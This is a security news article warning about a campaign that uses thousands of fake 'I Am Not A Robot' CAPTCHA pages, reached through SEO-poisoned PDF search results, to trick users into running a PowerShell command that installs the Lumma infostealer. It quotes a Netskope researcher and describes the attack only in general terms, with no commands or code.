5,000 CAPTCHA Tests Used As Infostealer Gateways—Do Not Complete Them
Security researchers have uncovered a sinister threat campaign that has deployed as many as 5,000 fake CAPTCHA "I Am Not A Robot" tests to install the notorious Lumma stealer malware. This malicious software is designed to steal sensitive information such as passwords, credit card details, and personal data from unsuspecting victims.
Netskope Threat Labs researchers have been tracking this widespread phishing campaign, which uses fake CAPTCHA images to trick users into completing the "I Am Not A Robot" test. The ultimate goal of these malicious tests is to install the Lumma infostealer malware, which can compromise a victim's security in a matter of seconds.
According to Jan Michael Alcantara, a threat research engineer at Netskope Threat Labs, the attackers employ SEO tactics to trick victims into visiting pages by clicking on malicious search engine results. Some of these fake CAPTCHAs contain embedded links that direct users to malicious websites, where they are prompted to paste clipboard content into a run window.
"This is a red flag in itself," warned Alcantara. "If the victim follows the instructions, a PowerShell command is executed that downloads and executes the Lumma Stealer malware." The report also revealed that at least 7,000 users have been affected so far, with most located in North America, Asia, and Southern Europe across various sectors such as technology, financial services, and manufacturing.
The Anatomy of the Attack
The PDF files used to deliver the Lumma Stealer malware contain images that direct victims to download the document. Once downloaded, the report explained, the victim is redirected to a malicious website with a fake CAPTCHA test. If completed, this test leads to the execution of a PowerShell command that downloads and executes the malware.
The Language of the Attack
Researchers have observed that nearly half of the 4,000 targeted keywords are related to user guides or manuals, while over a third are for templates and forms. The most frequently repeated keywords used to distribute the malicious documents include "pdf," "free," "download," and "printable."
Avoiding the Danger
Experts stress that knowing which PDF files are involved in these attacks is crucial in avoiding them. Thankfully, Netskope Threat Labs has made the indicators of compromise related to this latest infostealer campaign available on their GitHub repository.
"By being aware of these fake CAPTCHA tests and taking steps to avoid them, users can protect themselves against this malicious threat," warned Alcantara. "Be cautious when searching for PDF documents online, as attackers are using SEO tactics to trick victims into completing the 'I Am Not A Robot' test."
The Importance of Caution
"This is a wake-up call for all users to be vigilant when searching for PDF documents online," said Alcantara. "The threat landscape is constantly evolving, and attackers are becoming increasingly sophisticated in their tactics." By staying informed and taking proactive measures to protect themselves, individuals can avoid falling victim to this malicious campaign.